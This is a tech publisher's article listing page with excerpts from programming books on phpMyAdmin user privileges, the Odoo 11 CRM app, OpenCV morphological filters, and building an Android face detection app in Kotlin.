  Mastering phpMyAdmin 3.3.x for Effective MySQL Management A complete guide to get started with phpMyAdmin 3.3 and master its features The best introduction to phpMyAdmin available Written by the project leader of phpMyAdmin, and improved over several editions A step-by-step tutorial for manipulating data with phpMyAdmin Learn to do things with your MySQL database and phpMyAdmin that you didn't know were possible! Managing users and their privileges The Privileges subpage (visible only if we are logged in as a privileged user) contains dialogs to manage MySQL user accounts. It also contains dialogs to manage privileges on the global, database, and table levels. This subpage is hierarchical. For example, when editing a user's privileges, we can see the global privileges as well as the database-specific privileges. We can then go deeper to see the table-specific privileges for this database-user combination. The user overview The first page displayed when we enter the Privileges subpage is called User verview. This shows all user accounts and a summary of their global privileges, as shown in the next screenshot: From this page, we can: Edit a user's privileges, via the Edit link for this user Use the checkboxes to remove users, via the Remove selected users dialog Access the page when the Add a new User dialog is available The displayed users' list has columns with the following characteristics: Privileges reload At the bottom of User Overview, the following message is displayed: Note: phpMyAdmin gets the users' privileges directly from MySQL's privilege tables. The content of these tables may differ from the privileges the server uses, if they have been changed manually. In this case, you should reload the privileges before you continue. Here, the text reload the privileges is clickable. The effective privileges (the ones against which the server bases its access decisions) are the privileges that are located in the server's memory. Privilege modifications that are made from the User overview page are made both in memory and on disk, in the mysql database. Modifications made directly to the mysql database do not have immediate effect. The reload the privileges operation reads the privileges from the database and makes them effective in memory. Adding a user The Add a new User link opens a dialog for user account creation. First, we see the panel where we'll describe the account itself: The second part of the Add a new User dialog is where we'll specify the user's global privileges, which apply to the server as a whole. Entering the username The User name menu offers two choices. Firstly, we can choose Use text field and enter a username in the box, or we can choose Any user to create an anonymous user (the blank user). Let's choose Use text field and enter bill. Assigning a host value By default, this menu is set to Any host, with % as the host value. The Local choice means "localhost". The Use host table choice (which creates a blank value in the host field) means to look in the mysql.hosts table for database-specific privileges. Choosing Use text field allows us to enter the exact host value we want. Let's choose Local. Setting passwords Even though it's possible to create a user without a password (by selecting the No password option), it's best to have a password. We have to enter it twice (as we cannot see what is entered) to confirm the intended password. A secure password should have more than eight characters, and should contain a mixture of uppercase and lowercase characters, digits, and special characters. Therefore, it's recommended to have phpMyAdmin generate a password—this is possible in JavaScript-enabled browsers. In the Generate Password dialog, clicking on Generate enters a random password (in clear text) on the screen and fills the Password and Re-type input fields with the generated password. At this point, we should note the password so that we can pass it on to the user. Understanding rights for database creation A frequent convention is to assign a user the rights to a database having the same name as this user. To accomplish this, the Database for user section offers the checkbox Create database with same name and grant all privileges. Selecting this checkbox automates the process by creating both the database (if it does not already exist) and the corresponding rights. Please note that, with this method, each user would be limited to one database (user bill, database bill). Another possibility is to allow users to create databases that have the same prefix as their usernames. Therefore, the other choice, Grant all privileges on wildcard name (username_%), performs this function by assigning a wildcard privilege. With this in place, user bill could create the databases bill_test, bill_2, bill_payroll, and so on; phpMyAdmin does not pre-create the databases in this case. Assigning global privileges Global privileges determine the user's access to all databases. Hence, these are sometimes known as "superuser privileges". A normal user should not have any of these privileges unless there is a good reason for this. Of course, if we are really creating a superuser, we will select every global privilege that he or she needs. These privileges are further divided into Data, Structure, and Administration groups. In our example, bill will not have any global privileges. Limiting the resources used We can limit the resources used by this user on this server (for example, the maximum queries per hour). Zero means no limit. We will not impose any resource limits on bill. The following screenshot shows the status of the screen just before hitting Go to create this user's definition (with the remaining fields being set to default): Editing a user profile The page used to edit a user's profile appears after a user's creation, or whenever we click on Edit for a user in the User overview page. There are four sections on this page, each with its own Go button. Hence, each section is operated independently and has a distinct purpose. Editing privileges The section for editing the user's privileges has the same look as the Add a new User dialog, and is used to view and change global privileges. Assigning database-specific privileges In this section, we define the databases to which our user has access, and his or her exact privileges on these databases. As shown in the previous screenshot, we see None because we haven't defined any privileges yet. There are two ways of defining database privileges. First, we can choose one of the existing databases from the drop-down menu: This assigns privileges only for the chosen database. We can also choose Use text field and enter a database name. We could enter a non-existent database name, so that the user can create it later (provided that we give him or her the CREATE privilege in the next panel). We can also use special characters, such as the underscore and the percent sign, for wildcards. For example, entering bill here would enable him to create a bill database, and entering bill% would enable him to create a database with any name that starts with bill. For our example, we will enter bill and then click on Go. The next screen is used to set bill's privileges on the bill database, and create table-specific privileges. To learn more about the meaning of a specific privilege, we can move the mouse over a privilege name (which is always in English), and an explanation about this privilege appears in the current language. We give SELECT, INSERT, UPDATE, DELETE, CREATE, ALTER, INDEX, and DROP privileges to bill on this database. We then click on Go. After the privileges have been assigned, the interface stays at the same place, so that we can refine these privileges further. We cannot assign table-specific privileges for the moment, as the database does not yet exist. To go back to the general privileges page of bill, click on the 'bill'@'localhost' title. This brings us back to the following, familiar page, except for a change in one section: We see the existing privileges (which we can Edit or Revoke) on the bill database for user bill, and we can add privileges for bill on another database. We can also see that bill has no table-specific privileges on the bill database. Changing the password The Change password dialog is part of the Edit user page, and we can use it either to change bill's password or to remove it. Removing the password will enable bill to login without a password. The dialog offers a choice of password hashing options, and it's recommended to keep the default of MySQL 4.1+ hashing. For more details about hashing, please visit http://dev.mysql.com/doc/refman/5.1/en/password-hashing.html
Read more
  • 0
  • 0
  • 7139

article-image-implement-an-effective-crm-system-in-odoo-11-tutorial
Sugandha Lahoti
18 Jul 2018
18 min read
Save for later

Implement an effective CRM system in Odoo 11 [Tutorial]

Sugandha Lahoti
18 Jul 2018
18 min read
Until recently, most business and financial systems had product-focused designs while records and fields maintained basic customer information, processes, and reporting typically revolved around product-related transactions. In the past, businesses were centered on specific products, but now the focus has shifted to center the business on the customer. The Customer Relationship Management (CRM) system provides the tools and reporting necessary to manage customer information and interactions. In this article, we will take a look at what it takes to implement a CRM system in Odoo 11 as part of an overall business strategy. We will also install the CRM application and setup salespersons that can be assigned to our customers. This article is an excerpt from the book, Working with Odoo 11 - Third Edition by Greg Moss. In this book, you will learn to configure, manage, and customize your Odoo system. Using CRM as a business strategy It is critical that the sales people share account knowledge and completely understand the features and capabilities of the system. They often have existing tools that they have relied on for many years. Without clear objectives and goals for the entire sales team, it is likely that they will not use the tool. A plan must be implemented to spend time training and encouraging the sharing of knowledge to successfully implement a CRM system. Installing the CRM application If you have not installed the CRM module, log in as the administrator and then click on the Apps menu. In a few seconds, the list of available apps will appear. The CRM will likely be in the top-left corner: Click on Install to set up the CRM application. Look at the CRM Dashboard Like with the installation of the Sales application, Odoo takes you to the Discuss menu. Click on Sales to see the new changes after installing the CRM application. New to Odoo 10 is an improved CRM Dashboard that provides you a friendly welcome message when you first install the application. You can use the dashboard to get an overview of your sales pipelines and get easy access to the most common actions within CRM. Assigning the sales representative or account manager In Odoo 10, like in most CRM systems, the sales representative or account manager plays an important role. Typically, this is the person that will ultimately be responsible for the customer account and a satisfactory customer experience. While most often a company will use real people as their salespeople, it is certainly possible to instead have a salesperson record refer to a group, or even a sub-contracted support service. We will begin by creating a salesperson that will handle standard customer accounts. Note that a sales representative is also a user in the Odoo system. Create a new salesperson by going to the Settings menu, selecting Users, and then clicking the Create button. The new user form will appear. We have filled in the form with values for a fictional salesperson, Terry Zeigler. The following is a screenshot of the user's Access Rights tab: Specifying the name of the user You specify the username. Unlike some systems that provide separate first name and last name fields, with Odoo you specify the full name within a single field. Email address Beginning in Odoo 9, the user and login form prompts for email as opposed to username. This practice has continued in Odoo version 10 as well. It is still possible to use a user name instead of email address, but given the strong encouragement to use email address in Odoo 9 and Odoo 10, it is possible that in future versions of Odoo the requirement to provide an email address may be more strictly enforced. Access Rights The Access Rights tab lets you control which applications the user will be able to access. By default, Odoo will specify Mr.Ziegler as an employee so we will accept that default. Depending on the applications you may have already installed or dependencies Odoo may add in various releases, it is possible that you will have other Access Rights listed. Sales application settings When setting up your sales people in Odoo 10, you have three different options on how much access an individual user has to the sales system: User: Own Documents Only This is the most restrictive access to the sales application. A user with this access level is only allowed to see the documents they have entered themselves or which have been assigned to them. They will not be able to see Leads assigned to other salespeople in the sales application. User: All Documents With this setting, the user will have access to all documents within the sales application. Manager The Manager setting is the highest access level in the Odoo sales system. With this access level, the user can see all Leads as well as access the configuration options of the sales application. The Manager setting also allows the user to access statistical reports. We will leave the Access Rights options unchecked. These are used when working with multiple companies or with multiple currencies. The Preferences tab consists of the following options: Language and Timezone Odoo allows you to select the language for each user. Currently, Odoo supports more than 20 language translations. Specifying the Timezone field allows Odoo to coordinate the display of date and time on messages. Leaving Timezone blank for a user will sometimes lead to unpredictable behavior in the Odoo software. Make sure you specify a timezone when creating a user record. Email Messages and Notifications In Odoo 7, messaging became a central component of the Odoo system. In version 10, support has been improved and it is now even easier to communicate important sales information between colleagues. Therefore, determining the appropriate handling of email, and circumstances in which a user will receive email, is very important. The Email Messages and Notifications option lets you determine when you will receive email messages from notifications that come to your Odoo inbox. For our example, we have chosen All Messages. This is now the new default setting in Odoo 10. However, since we have not yet configured an email server, or if you have not configured an email server yourself, no emails will be sent or received at this stage. Let's review the user options that will be available in communicating by email. Never: Selecting Never suppresses all email messaging for the user. Naturally, this is the setting you will wish to use if you do not have an email server configured. This is also a useful option for users that simply want to use the built-in inbox inside Odoo to retrieve their messages. All Messages (discussions, emails, followed system notifications): This option sends an email notification for any action that would create an entry in your Odoo inbox. Unlike the other options, this action can include system notifications or other automated communications. Signature The Signature section allows you to customize the signature that will automatically be appended to Odoo-generated messages and emails. Manually setting the user password You may have noticed that there is no visible password field in the user record. That is because the default method is to email the user an account verification they can use to set their password. However, if you do not have an email server configured, there is an alternative method for setting the user password. After saving the user record, use the Change Password button at the top of the form. A form will then appear allowing you to set the password for the user. Now in Odoo 10, there is a far more visible button available at the top left of the form. Just click the Change Password button. Assigning a salesperson to a customer Now that we have set up our salesperson, it is time to assign the salesperson their first customer. Previously, no salesperson had been assigned to our one and only customer, Mike Smith. So let's go to the Sales menu and then click on Mike Smith to pull up his customer record and assign him Terry Ziegler as his salesperson. The following screenshot is of the customer screen opened to assign a salesperson: Here, we have set the sales person to Terry Zeigler. By assigning your customers a salesperson, you can then better organize your customers for reports and additional statistical analysis. Understanding Your Pipeline Prior to Odoo 10, the CRM application primarily was a simple collection of Leads and opportunities. While Odoo still uses both Leads and opportunities as part of the CRM application, the concept of a Pipeline now takes center stage. You use the Pipeline to organize your opportunities by what stage they are within your sales process. Click on Your Pipeline in the Sales menu to see the overall layout of the Pipeline screen: In the preceding Pipeline forms, one of the first things to notice is that there are default filters applied to the view. Up in the search box, you will see that there is a filter to limit the records in this view to the Direct Sales team as well as a My Opportunities filter. This effectively limits the records so you only see your opportunities from your primary sales team. Removing the My Opportunities filter will allow you to see opportunities from other salespeople in your organization. Creating new opportunity In Odoo 10, a potential sale is defined by creating a new opportunity. An opportunity allows you to begin collecting information about the scope and potential outcomes for a sale. These opportunities can be created from new Leads, or an opportunity can originate from an existing customer. For our real-world example, let's assume that Mike Smith has called and was so happy with his first order that he now wants to discuss using Silkworm for his local sports team. After a short conversation we decide to create an opportunity by clicking the Create button. You can also use the + buttons within any of the pipeline stages to create an opportunity that is set to that stage in the pipeline. In Odoo 10, the CRM application greatly simplified the form for entering a new opportunity. Instead of bringing up the entire opportunity form with all the fields you get a simple form that collects only the most important information. The following screenshot is of a new opportunity form: Opportunity Title The title of your opportunity can be anything you wish. It is naturally important to choose a subject that makes it easy to identify the opportunity in a list. This is the only field required to create an opportunity in Odoo 10. Customer This field is automatically populated if you create an opportunity from the customer form. You can, however, assign a different customer if you like. This is not a required field, so if you have an opportunity that you do not wish to associate with a customer, that is perfectly fine. For example, you may leave this field blank if you are attending a trade show and expect to have revenue, but do not yet have any specific customers to attribute to the opportunity. Expected revenue Here, you specify the amount of revenue you can expect from the opportunity if you are successful. Inside the full opportunity form there is a field in which you can specify the percentage likelihood that an opportunity will result in a sale. These values are useful in many statistical reports, although they are not required to create an opportunity. Increasingly, more reports look to expected revenue and percentage of opportunity completions. Therefore, depending on your reporting requirements you may wish to encourage sales people to set target goals for each opportunity to better track conversion. Rating Some opportunities are more important than others. You can choose none, one, two, or three stars to designate the relative importance of this opportunity. Introduction to sales stages At the top of the Kanban view, you can see the default stages that are provided by an Odoo CRM installation. In this case, we see New, Qualified, Proposition, and Won. As an opportunity moves between stages, the Kanban view will update to show you where each opportunity currently stands. Here, we can see because this Sports Team Project has just been entered in the New column. Viewing the details of an opportunity If you click the three lines at the top right of the Sports Team Project opportunity in the Kanban view, which appears when you hover the mouse over it, you will see a pop-up menu with your available options. The following screenshot shows the available actions on an opportunity: Actions you can take on an opportunity Selecting the Edit option takes you to the opportunity record and into edit mode for you to change any of the information. In addition, you can delete the record or archive the record so it will no longer appear in your pipeline by default. The color palette at the bottom lets you color code your opportunities in the Kanban view. The small stars on the opportunity card allow you to highlight opportunities for special consideration. You can also easily drag and drop the opportunity into other columns as you work through the various stages of the sale. Using Odoo's OpenChatter feature One of the biggest enhancements brought about in Odoo 7 and expanded on in later versions of Odoo was the new OpenChatter feature that provides social networking style communication to business documents and transactions. As we work our brand new opportunity, we will utilize the OpenChatter feature to demonstrate how to communicate details between team members and generate log entries to document our progress. The best thing about the OpenChatter feature is that it is available for nearly all business documents in Odoo. It also allows you to see a running set of logs of the transactions or operations that have affected the document. This means everything that applies here to the CRM application can also be used to communicate in sales and purchasing, or in communicating about a specific customer or vendor. Changing the status of an opportunity For our example, let's assume that we have prepared our proposal and made the presentation. Bring up the opportunity by using the right-click Menu in the Kanban view or going into the list view and clicking the opportunity in the list. It is time to update the status of our opportunity by clicking the Proposition arrow at the top of the form: Notice that you do not have to edit the record to change the status of the opportunity. At the bottom of the opportunity, you will now see a logged note generated by Odoo that documents the changing of the opportunity from a new opportunity to a proposition. The following screenshot is of OpenChatter displaying a changed stage for the opportunity: Notice how Odoo is logging the events automatically as they take place. Managing the opportunity With the proposal presented, let's take down some details from what we have learned that may help us later when we come back to this opportunity. One method of collecting this information could be to add the details to the Internal Notes field in the opportunity form. There is value, however, in using the OpenChatter feature in Odoo to document our new details. Most importantly, using OpenChatter to log notes gives you a running transcript with date and time stamps automatically generated. With the Generic Notes field, it can be very difficult to manage multiple entries. Another major advantage is that the OpenChatter feature can automatically send messages to team members' inboxes updating them on progress. let's see it in action! Click the Log an Internal note link to attach a note to our opportunity. The following screenshot is for creating a note: The activity option is unique to the CRM application and will not appear in most documents. You can use the small icons at the bottom to add a smiley, attach a document, or open up a full featured editor if you are creating a long note. The full featured editor also allows you to save templates of messages/notes you may use frequently. Depending on your specific business requirements, this could be a great time saver. When you create a note, it is attached to the business document, but no message will be sent to followers. You can even attach a document to the note by using the Attach a File feature. After clicking the Log button, the note is saved and becomes part of the OpenChatter log for that document. Following a business document Odoo brings social networking concepts into your business communication. Fundamental to this implementation is that you can get automatic updates on a business document by following the document. Then, whenever there is a note, action, or a message created that is related to a document you follow, you will receive a message in your Odoo inbox. In the bottom right-hand corner of the form, you are presented with the options for when you are notified and for adding or removing followers from the document. The following screenshot is of the OpenChatter follow options: In this case, we can see that both Terry Zeigler and Administrator are set as followers for this opportunity. The Following checkbox at the top indicates that I am following this document. Using the Add Followers link you can add additional users to follow the document. The items followers are notified are viewed by clicking the arrow to the right of the following button. This brings up a list of the actions that will generate notifications to followers: The checkbox next to Discussions indicates that I should be notified of any discussions related to this document. However, I would not be notified, for example, if the stage changed. When you send a message, by default the customer will become a follower of the document. Then, whenever the status of the document changes, the customer will receive an email. Test out all your processes before integrating with an email server. Modifying the stages of the sale We have seen that Odoo provides a default set of sales stages. Many times, however, you will want to customize the stages to best deliver an outstanding customer experience. Moving an opportunity through stages should trigger actions that create a relationship with the customer and demonstrate your understanding of their needs. A customer in the qualification stage of a sale will have much different needs and much different expectations than a customer that is in the negotiation phase. For our case study, there are sometimes printing jobs that are technically complex to accomplish. With different jerseys for a variety of teams, the final details need to go through a final technical review and approval process before the order can be entered and verified. From a business perspective, the goal is not just to document the stage of the sales cycle; the primary goal is to use this information to drive customer interactions and improve the overall customer experience. To add a stage to the sales process, bring up Your Pipeline and then click on the ADD NEW COLUMN area in the right of the form to bring up a little popup to enter the name for the new stage: After you have added the column to the sales process, you can use your mouse to drag and drop the columns into the order that you wish them to appear. We are now ready to begin the technical approval stage for this opportunity. Drag and drop the Sports Team Project opportunity over to the Technical Approval column in the Kanban view. The following screenshot is of the opportunities Kanban view after adding the technical approval stage: We now see the Technical Approval column in our Kanban view and have moved over the opportunity. You will also notice that any time you change the stage of an opportunity that there will be an entry that will be created in the OpenChatter section at the bottom of the form. In addition to the ability to drag and drop an opportunity into a new stage, you can also change the stage of an opportunity by going into the form view. Closing the sale After a lot of hard work, we have finally won the opportunity, and it is time to turn this opportunity into a quotation. At this point, Odoo makes it easy to take that opportunity and turn it into an actual quotation. Open up the opportunity and click the New Quotation tab at the top of the opportunity form: Unlike Odoo 8, which prompts for more information, in Odoo 10 you get taken to a new quote with the customer information already filled in: We installed the CRM module, created salespeople, and proceeded to develop a system to manage the sales process. To modify stages in the sales cycle and turn the opportunity into a quotation using Odoo 11, grab the latest edition  Working with Odoo 11 - Third Edition. ERP tool in focus: Odoo 11 Building Your First Odoo Application How to Scaffold a New module in Odoo 11
Read more
  • 0
  • 0
  • 7138
article-image-opencv-image-processing-using-morphological-filters
Packt
25 May 2011
6 min read
Save for later

OpenCV: Image Processing using Morphological Filters

Packt
25 May 2011
6 min read
  OpenCV 2 Computer Vision Application Programming Cookbook Over 50 recipes to master this library of programming functions for real-time computer vision         Read more about this book       Morphological filtering is a theory developed in the 1960s for the analysis and processing of discrete images. It defines a series of operators which transform an image by probing it with a predefined shape element. The way this shape element intersects the neighborhood of a pixel determines the result of the operation. This article presents the most important morphological operators. It also explores the problem of image segmentation using algorithms working on the image morphology. Eroding and dilating images using morphological filters Erosion and dilation are the most fundamental morphological operators. Therefore, we will present them in this first recipe. The fundamental instrument in mathematical morphology is the structuring element. A structuring element is simply defined as a configuration of pixels (a shape) on which an origin is defined (also called anchor point). Applying a morphological filter consists of probing each pixel of the image using this structuring element. When the origin of the structuring element is aligned with a given pixel, its intersection with the image defines a set of pixels on which a particular morphological operation is applied. In principle, the structuring element can be of any shape, but most often, a simple shape such as a square, circle, or diamond with the origin at the center is used (mainly for efficiency reasons). Getting ready As morphological filters usually work on binary images, we will use a binary image produced through thresholding. However, since in morphology, the convention is to have foreground objects represented by high (white) pixel values and background by low (black) pixel values, we have negated the image. How to do it... Erosion and dilation are implemented in OpenCV as simple functions which are cv::erode and cv::dilate. Their use is straightforward: // Read input imagecv::Mat image= cv::imread("binary.bmp");// Erode the imagecv::Mat eroded; // the destination imagecv::erode(image,eroded,cv::Mat());// Display the eroded imagecv::namedWindow("Eroded Image");");cv::imshow("Eroded Image",eroded);// Dilate the imagecv::Mat dilated; // the destination imagecv::dilate(image,dilated,cv::Mat());// Display the dilated imagecv::namedWindow("Dilated Image");cv::imshow("Dilated Image",dilated); The two images produced by these function calls are seen in the following screenshot. Erosion is shown first: Followed by the dilation result: How it works... As with all other morphological filters, the two filters of this recipe operate on the set of pixels (or neighborhood) around each pixel, as defined by the structuring element. Recall that when applied to a given pixel, the anchor point of the structuring element is aligned with this pixel location, and all pixels intersecting the structuring element are included in the current set. Erosion replaces the current pixel with the minimum pixel value found in the defined pixel set. Dilation is the complementary operator, and it replaces the current pixel with the maximum pixel value found in the defined pixel set. Since the input binary image contains only black (0) and white (255) pixels, each pixel is replaced by either a white or black pixel. A good way to picture the effect of these two operators is to think in terms of background (black) and foreground (white) objects. With erosion, if the structuring element when placed at a given pixel location touches the background (that is, one of the pixels in the intersecting set is black), then this pixel will be sent to background. While in the case of dilation, if the structuring element on a background pixel touches a foreground object, then this pixel will be assigned a white value. This explains why in the eroded image, the size of the objects has been reduced. Observe how some of the very small objects (that can be considered as "noisy" background pixels) have also been completely eliminated. Similarly, the dilated objects are now larger and some of the "holes" inside of them have been filled. By default, OpenCV uses a 3x3 square structuring element. This default structuring element is obtained when an empty matrix (that is cv::Mat()) is specified as the third argument in the function call, as it was done in the preceding example. You can also specify a structuring element of the size (and shape) you want by providing a matrix in which the non-zero element defines the structuring element. In the following example, a 7x7 structuring element is applied: cv::Mat element(7,7,CV_8U,cv::Scalar(1));cv::erode(image,eroded,element); The effect is obviously much more destructive in this case as seen here: Another way to obtain the same result is to repetitively apply the same structuring element on an image. The two functions have an optional parameter to specify the number of repetitions: // Erode the image 3 times.cv::erode(image,eroded,cv::Mat(),cv::Point(-1,-1),3); The origin argument cv::Point(-1,-1) means that the origin is at the center of the matrix (default), and it can be defined anywhere on the structuring element. The image obtained will be identical to the one we obtained with the 7x7 structuring element. Indeed, eroding an image twice is like eroding an image with a structuring element dilated with itself. This also applies to dilation. Finally, since the notion of background/foreground is arbitrary, we can make the following observation (which is a fundamental property of the erosion/dilation operators). Eroding foreground objects with a structuring element can be seen as a dilation of the background part of the image. Or more formally: The erosion of an image is equivalent to the complement of the dilation of the complement image. The dilation of an image is equivalent to the complement of the erosion of the complement image. There's more... It is important to note that even if we applied our morphological filters on binary images here, these can also be applied on gray-level images with the same definitions. Also note that the OpenCV morphological functions support in-place processing. This means you can use the input image as the destination image. So you can write: cv::erode(image,image,cv::Mat()); OpenCV creates the required temporary image for you for this to work properly.
Read more
  • 0
  • 0
  • 7131

article-image-building-an-android-app-using-the-google-faces-api-tutorial
Sugandha Lahoti
27 Sep 2018
11 min read
Save for later

Building an Android App using the Google Faces API [ Tutorial]

Sugandha Lahoti
27 Sep 2018
11 min read
The ability of computers to perform tasks such as identifying objects has always been a humongous task for both the software and the required architecture. This isn't the case anymore since the likes of Google, Amazon, and a few other companies have done all the hard work, providing the infrastructure and making it available as a cloud service. It should be noted that they are as easy to access as making REST API calls. Read Also: Machine Learning as a Service (MLaaS): How Google Cloud Platform, Microsoft Azure, and AWS are democratizing Artificial Intelligence This article is taken from the book Learning Kotlin by building Android Applications by Eunice Adutwumwaa Obugyei and Natarajan Raman. This book will teach you programming in Kotlin including data types, flow control, lambdas, object-oriented, and functional programming while building  Android Apps. In this tutorial, you will learn how to use the face detection API from Google's Mobile Vision API to detect faces and add fun functionalities such as adding rabbit ears to a user's picture. We will cover the following topics: Identifying human faces in an image Tracking human faces from a camera feed Identifying specific parts of the face (for example, eyes, ears, nose, and mouth) Drawing graphics on specific parts of a detected face in an image (for example, rabbit ears over the user's ears) Introduction to Mobile Vision The Mobile Vision API provides a framework for finding objects in photos and videos. The framework can locate and describe visual objects in images or video frames, and it has an event-driven API that tracks the position of those objects. Currently, the Mobile Vision API includes face, barcode, and text detectors. Faces API concepts Before diving into coding the features, it is necessary that you understand the underlying concepts of the face detection capabilities of the face detection API. From the official documentation: Face detection is the process of automatically locating human faces in visual media (digital images or video). A face that is detected is reported at a position with an associated size and orientation. Once a face is detected, it can be searched for landmarks such as the eyes and nose. A key point to note is that only after a face is detected, will landmark such as eyes and a nose be searched for. As part of the API, you could opt out of detecting these landmarks. Note the difference between face detection and face recognition. While the former is able to recognize a face from an image or video, the latter does the same and is also able to tell that a face has been seen before. The former has no memory of a face it has detected before. We will be using a couple of terms in this section, so let me give you an overview of each of these before we go any further: Face tracking extends face detection to video sequences. When a face appears in a video for any length of time, it can be identified as the same person and can be tracked. It is important to note that the face that you are tracking must appear in the same video. Also, this is not a form of face recognition; this mechanism just makes inferences based on the position and motion of the face(s) in a video sequence. A landmark is a point of interest within a face. The left eye, right eye, and nose base are all examples of landmarks. The Face API provides the ability to find landmarks on a detected face. Classification is determining whether a certain facial characteristic is present. For example, a face can be classified with regards to whether its eyes are open or closed or smiling or not. Getting started – detecting faces You will first learn how to detect a face in a photo and its associated landmarks. We will need some requirements in order to pursue this. With a minimum of Google Play Services 7.8, you can use the Mobile Vision APIs, which provide the face detection APIs. Make sure you update your Google Play Services from the SDK manager so that you meet this requirement. Get an Android device that runs Android 4.2.2 or later or a configured Android Emulator. The latest version of the Android SDK includes the SDK tools component. Creating the FunyFace project Create a new project called FunyFace. Open up the app module's build.gradle file and update the dependencies to include the Mobile Vision APIs: dependencies { implementation fileTree(dir: 'libs', include: ['*.jar']) implementation"org.jetbrains.kotlin:kotlin-stdlib-jre7:$kotlin_version" implementation 'com.google.android.gms:play-services-vision:11.0.4' ... } Now, update your AndroidManifest.xml to include meta data for the faces API: <meta-data android:name="com.google.android.gms.vision.DEPENDENCIES" android:value="face" /> Now, your app is ready to use the face detection APIs. To keep things simple, for this lab, you're just going to process an image that is already present in your app. Add the following image to your res/drawable folder: Now, this is how you will go about performing face detection. You will first load the image into memory, get a Paint instance, and create a temporary bitmap based on the original, from which you will create a canvas. Create a frame using the bitmap and then call the detect method on FaceDetector, using this frame to get back SparseArray of face objects. Well, let's get down to business—this is where you will see how all of these play out. First, open up your activity_main.xml file and update the layout so that it has an image view and a button. See the following code: <?xml version="1.0" encoding="utf-8"?> <FrameLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" xmlns:app="http://schemas.android.com/apk/res-auto" tools:context="com.packtpub.eunice.funyface.MainActivity"> <ImageView android:id="@+id/imageView" android:layout_width="match_parent" android:layout_height="match_parent" android:src="@mipmap/ic_launcher_round" app:layout_constraintBottom_toTopOf="parent" android:scaleType="fitCenter"/> <Button android:id="@+id/button" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_gravity="bottom|center" android:text="Detect Face"/> </FrameLayout> That is all you need to do here so that you have FrameLayout with ImageView and a button. Now, open up MainActivity.kt and add the following import statements. This is just to make sure that you import from the right packages as you move along. In your onCreate() method, attach a click listener to the button in your MainActivity layout file: package com.packtpub.eunice.funface import android.graphics.* import android.graphics.drawable.BitmapDrawable import android.os.Bundle import android.support.v7.app.AlertDialog import android.support.v7.app.AppCompatActivity import com.google.android.gms.vision.Frame import com.google.android.gms.vision.face.FaceDetector import kotlinx.android.synthetic.main.activity_main.* class MainActivity : AppCompatActivity() { override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) setContentView(R.layout.activity_main) button.setOnClickListener { detectFace() } } } Loading the image In your detectFace() method, you will first load your image from the drawable folder into memory and create a bitmap image from it. Since you will be updating this bitmap to paint over it when the face is detected, you need to make it mutable. This is what makes your bitmap mutable: options.inMutable=true See the following implementation: private fun detectFace() { // Load the image val bitmapOptions = BitmapFactory.Options() bitmapOptions.inMutable = true val myBitmap = BitmapFactory.decodeResource( applicationContext.resources, R.drawable.children_group_picture, bitmapOptions) } Creating a Paint instance Use the Paint API to get an instance of the Paint class. You will only draw around the face, and not paint the whole face. To do this, set a thin stroke, give it a color, which in our case is red, and set the style of paint to STROKE using Paint.Style.STROKE: // Get a Paint instance val myRectPaint = Paint() myRectPaint.strokeWidth = 5F myRectPaint.color = Color.RED myRectPaint.style = Paint.Style.STROKE The Paint class holds the information related to the style and color related to the text, bitmap, and various shapes. Creating a canvas To get the canvas, first create a bitmap using the dimensions from the bitmap you created earlier. With this canvas, you will paint over the bitmap to draw the outline of the face after it has been detected: // Create a canvas using the dimensions from the image's bitmap val tempBitmap = Bitmap.createBitmap(myBitmap.width, myBitmap.height, Bitmap.Config.RGB_565) val tempCanvas = Canvas(tempBitmap) tempCanvas.drawBitmap(myBitmap, 0F, 0F, null) The Canvas class is used to hold the call made to draw. A canvas is a drawing surface and it provides various methods for drawing onto a bitmap. Creating the face detector All you have done thus far is basically housekeeping. You will now access the FaceDetector API by which you will, well, detect the face in the image. You will disable tracking for now, as you only want to detect the face at this stage. Note that on its first run, the Play Services SDK will take some time to initialize the Faces API. It may or may not have completed this process at the time you intend to use it. Therefore, as a safety check, you need to ensure its availability before using it. In this case, you will show a simple dialog to the user if the FaceDetector is not ready at the time the app is run. Also, note that you may need an internet connection as the SDK initializes. You also need to ensure you have enough space, as the initialization may download some native library onto the device: // Create a FaceDetector val faceDetector = FaceDetector.Builder(applicationContext).setTrackingEnabled(false) .build() if (!faceDetector.isOperational) { AlertDialog.Builder(this) .setMessage("Could not set up the face detector!") .show() return } Detecting the faces Now, you will use the detect() method from the faceDetector instance to get the faces and their metadata. The result will be SparseArray of Face objects: // Detect the faces val frame = Frame.Builder().setBitmap(myBitmap).build() val faces = faceDetector.detect(frame) Drawing rectangles on the faces Now that you have the faces, you will iterate through this array to get the coordinates of the bounding rectangle for the face. Rectangles require x, y of the top left and bottom right corners, but the information available only gives the left and top positions, so you have to calculate the bottom right using the top left, width, and height. Then, you need to release the faceDetector to free up resources. Here's the code: // Mark out the identified face for (i in 0 until faces.size()) { val thisFace = faces.valueAt(i) val left = thisFace.position.x val top = thisFace.position.y val right = left + thisFace.width val bottom = top + thisFace.height tempCanvas.drawRoundRect(RectF(left, top, right, bottom), 2F, 2F, myRectPaint) } imageView.setImageDrawable(BitmapDrawable(resources, tempBitmap)) // Release the FaceDetector faceDetector.release() Results All set. Run the app, press the DETECT FACE button, and wait a while...:   The app should detect the face and a square box should appear around the face, voila: Okay, let's move on and add some fun to their faces. To do this, you need to identify the position of the specific landmark you want, then draw over it. To find out the landmark's representation, you label them this time around, then later draw your filter to the desired position. To label, update the for loop which drew the rectangle around the face: // Mark out the identified face for (i in 0 until faces.size()) { ... for (landmark in thisFace.landmarks) { val x = landmark.position.x val y = landmark.position.y when (landmark.type) { NOSE_BASE -> { val scaledWidth = eyePatchBitmap.getScaledWidth(tempCanvas) val scaledHeight = eyePatchBitmap.getScaledHeight(tempCanvas) tempCanvas.drawBitmap(eyePatchBitmap, x - scaledWidth / 2, y - scaledHeight / 2, null) } } } } Run the app and take note of the labels of the various landmarks: There you have it! That's funny, right? Summary In this tutorial, we learned how to use the Mobile Vision APIs, in this case, the Faces API. There are a few things to note here. This program is not optimized for production. Some things you can do on your own are, load the image and do the processing in a background thread. You can also provide a functionality to allow the user to pick and choose images from different sources other than the static one used. You can get more creative with the filters and how they are applied too. Also, you can enable the tracking feature on the FaceDetector instance, and feed in a video to try out face tracking. To know more about Kotlin APIs as a preliminary for building stunning applications for Android, read our book 